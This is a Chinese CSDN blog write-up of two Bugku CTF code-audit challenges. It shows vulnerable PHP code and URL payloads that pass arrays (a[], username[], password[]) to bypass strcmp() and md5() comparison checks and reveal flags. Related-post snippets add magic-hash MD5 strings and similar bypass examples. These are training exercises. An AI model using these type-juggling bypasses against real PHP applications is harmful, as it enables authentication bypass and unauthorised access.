BugkuCTF_代码审计——“strcmp比较字符串“、“md5()函数“

最新推荐文章于 2021-12-10 11:10:11 发布
最新推荐文章于 2021-12-10 11:10:11 发布
阅读量463 收藏
点赞数
分类专栏: # CTF-Web 文章标签: 字符串 php ctf 安全 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/108566631
版权

文章目录

一、“strcmp比较字符串”

本题使用strcmp()函数漏洞实现,基于PHP5.3以前版本

若strcmp传入参数并非未字符串时,虽然会报错但是函数合法

<?php
$flag = "flag{xxxxx}";
if (isset($_GET['a'])) {
if (strcmp($_GET['a'], $flag) == 0)
die('Flag: '.$flag);
else
print 'No';
}
?>

因此只需要上传一个变量名为a的非字符串变量,此处考虑使用数组

http://123.206.87.240:9009/6.php?a[]

flag{bugku_dmsj_912k}

二、“md5()函数”

–>PHP绕过md5函数传送门<– PHP绕过md5()

http://123.206.87.240:9009/18.php?username[] = '1' & password[] = '2'

flag{bugk1u-ad8-3dsa-2}

欢迎在评论区留言
感谢浏览

Ho1aAs
关注
专栏目录
BugKuCTF(CTF-练习平台)——代码审计-strcmp比较字符串
Ifish的博客
04-27 3484
题目描述 解题 strcmp漏洞 int strcmp ( string str1,stringstr1,stringstr1 , string str2 ) str1是第一个字符串,str2是第二个字符串。如果 str1 小于 str2 返回 &amp;lt; 0; 如果 str1 大于 str2 返回 &amp;gt; 0;如果两者相等,返回 0。 但是如果我们传入非字符串类型的数据的时候,...
bugku ctf md5 collision(NUPT_CTF)
qq_42777804的博客
08-01 374
这道题现在来看应该是少给了 源码 我在网上搜别人的解析都有源码也不知道他们在那里找到的嘻嘻嘻 附上把 <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo...
代码审计_strcmp比较字符串
weixin_30693683的博客
02-15 81
题目链接:https://ctf.bugku.com/challenges 题解: 打开题目 PHP代码如下: 该代码中相关知识点链接如下: isset函数:http://www.w3school.com.cn/php/func_misc_die.asp strcmp函数:http://www.w3school.com.cn/php/func_string_strcmp.a...
CTF EasyStrcmp
just_a_fresh_man的博客
12-10 252
第一次做一道不能直接用string搜索得到答案的题目,所以在这里记录下大体应该怎么操作,来找到最后的答案 第一步,找到fun窗口,然后找到main函数 就上面那个左边窗口最下面那个,然后点开,然后搜索字符串,当然,也可以不搜,你看右图,你发现了这个 然后你就可以猜了,add上面的那个可能是输出用的函数,add下面那个可能是让你输入的函数,然后你可以注意下,push Str,基本可以猜Str估计就是首地址了,后面跟着的就是你输进去的东西 然后根据流程图,那么你就可以大胆猜测,有Str的或者和Str有.
strcmpCTF中的案例
aiquan9342的博客
04-30 738
strcmp比较出错的时候就会为null。null即为0故输出flag。 strcmp(arr,str); ?test[]=1 <?php define('FLAG', 'pwnhub{THIS_IS_FLAG}'); if (@strcmp($_GET['flag'], FLAG) == 0) { echo "success, fla...
PHP字符串比较函数strcmp()和strcasecmp()使用总结
12-18
strcmp()函数用于按字节顺序进行区分大小写的字符串比较。它的基本语法是: ```php int strcmp(string str1, string str2) ``` 该函数接收两个字符串作为参数,然后逐个比较它们的字节(基于ASCII值)。如果str1和...
SIMATIC Wincc中与字符串相关的函数使用方法(拷贝_比较_连接_转换)及举例说明.docx
09-14
2. **strcmp()**:此函数用于比较两个字符串。如果两个字符串完全相同,`strcmp()` 返回0;否则返回非零值。在例子中,它被用来检查 `pszValue` 是否等于 "abcdefgh",如果相等,则设置变量 `TEST` 的值为100。 3. ...
ctf php代码审计 绕过,Bugku CTF代码审计解题记录
weixin_35870524的博客
04-11 829
前言此笔记为在Bugku CTF平台上做代码审计题目的过程,也算是一篇wp吧extract变量覆盖extract($_GET):$_GET:表示在传递参数时,URL通过get的方式传参,传输的数据以数组的形式封装在$_GET中extract():从数组中将变量导入到当前的符号表。该函数使用数组键名作为变量名,数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量file_ge...
基于PHP字符串比较函数strcmp()与strcasecmp()的使用详解
12-18
本文将深入探讨两种常用的字符串比较函数strcmp()和strcasecmp(),以及它们在实际开发中的应用。 首先,我们要理解基本的比较运算符如"=="和"==="。"=="用于检查两个值是否相等,不考虑数据类型,它会尝试将非...
BugkuCTF-WEB题MD5
am_03的博客
08-29 380
解题流程 打开页面: 根据提示:md5 collision 找一个以0e开头的md5值 0e开头MD5值小结 s878926199a 0e545993274517709034328855841020 s155964671a 0e342768416822451524974117254469 s214587387a 0e848240448830537924465865611904 s214587387a 0e848240448830537924465865611904 s878926199a 0e54599
bugku ctf 代码审计 md5()函数
qq_42777804的博客
05-25 2538
<?php error_reporting(0); $flag = 'flag{test}'; if (isset($_GET['username']) and isset($_GET['password'])) { if ($_GET['username'] == $_GET['password']) print 'Your password can not be your userna...
字符串MD5值,适用于大文本的比较
iteye_11257的博客
04-01 624
public class Test { protected static char hexDigits[] = {'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'}; public static void main(String[] arg...
re -12 buuctf [Zer0pts2020]easy strcmp
weixin_45847059的博客
11-19 1011
[Zer0pts2020]easy strcmp 前话:这题要用到ida64位远程调试先记录一下配置方法,因为本人使用的是ida7.6版本差异可能导致问题。 application与input file填linux路径下的题目文件路径 dictionary填linu下题目文件所在文件夹的路径(即题目文件的父级) Paramater不填 Hostname用ifconfig填自己的ip,Port端口固定 Password虚拟机密码 运行一下: 去找个地方下个断点: 这里的strcmp函数比较值的结果决定回
md5相 同字符串加密后equals不相等问题
unowen的博客
01-02 1360
问题描述: 将生成的md5字符串手动复制到数据库中,对比的时候再次生成,使用equals方法对比发现不相等。 分析思考: 使用string.length()发现手动的复制的长度为38,md5生成的是32. 使用字符编码后依旧不能解决。 解决方案: 不手动复制,直接将生成的字符串 update到数据库。问题解决。 ...
ctf 绕过php,第三届NSCTF测试题Code phpMD5碰撞和php strcmp函数绕过
weixin_36402765的博客
03-19 304
第三届NSCTF测试题Code phpMD5碰撞和php strcmp函数绕过1、打开网页如图,F12发现code.txt:2、需要php代码审计,提示需要get方式提交3个参数(v1、v2、v3)且v1和v2的值不同,但md5后的值相同(中间是&&与符号),为真时再利用strcmp函数判断v3和$flag是否相同,为真输出flag;3、在问了几个朋友后,得到一些提示,首先MD...
bugku strcmp比较字符串
m0_52432374的博客
03-24 630
Bugku—strcmp比较字符串 <?php $flag = "flag{xxxxx}"; if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。 //比较两个字符串(区分大小写) die('Flag: '.$flag); else print 'No'; } ?> strcmp() strcm
bugku 代码审计2 strcmp比较字符串
BengDouLove的博客
02-12 237
bugku 代码审计2 strcmp比较字符串 <?php $flag = "flag{xxxxx}"; if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。 //比较两个字符串...
strcmp()函数
Sky*殇的博客
11-23 1387
有时我们经常会比较俩个字符串之间的内容,而字符串的定义是通过数组定义或指针定义,但无论是哪种,在比较字符串内容时,都会用到指针,即: 对于数组定义: 由以上代码可知,因为arr和brr都是指针,所以arr!=brr检查的不是俩个字符串的内容是否相等,而检查的是俩个字符串的地址是否相同,因为arr和brr储存在不同的位置,所以这俩个地址不可能相同,所以无论输入什么,即使输入的字符串内容相同,它也会出现错误。 对于指针定义则没有这种问题,即: —————————————— —分割线—————————.
php函数的常见漏洞
sun的博客
09-30 1825
php中得strcmp()函数的漏洞: strcmp(a1,a2)函数用来比较两个字符串是否相等的,比较的是对应字符的ascii码,如果相等返回0,当a1的ascii大于a2的返回小于0,a1的ascii码小于a2的,返回大于0. 但是这个函数是存在漏洞的,我们知道这个函数是用来比较字符串的,但是当我们传入为数组是,那变成字符串和数组进行比较了,因此php在5.2之前,默认返回的-1,5.2版...
C语言用strcmp函数比较字符串与字符0代码
最新发布
05-28
在上面的代码中,我们将字符0转换成了一个字符串,然后用strcmp函数比较字符串"hello"和字符串"0"的大小关系。注意,strcmp函数返回的结果是一个整数,如果两个字符串相等,结果为0,如果第一个字符串小于第二个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值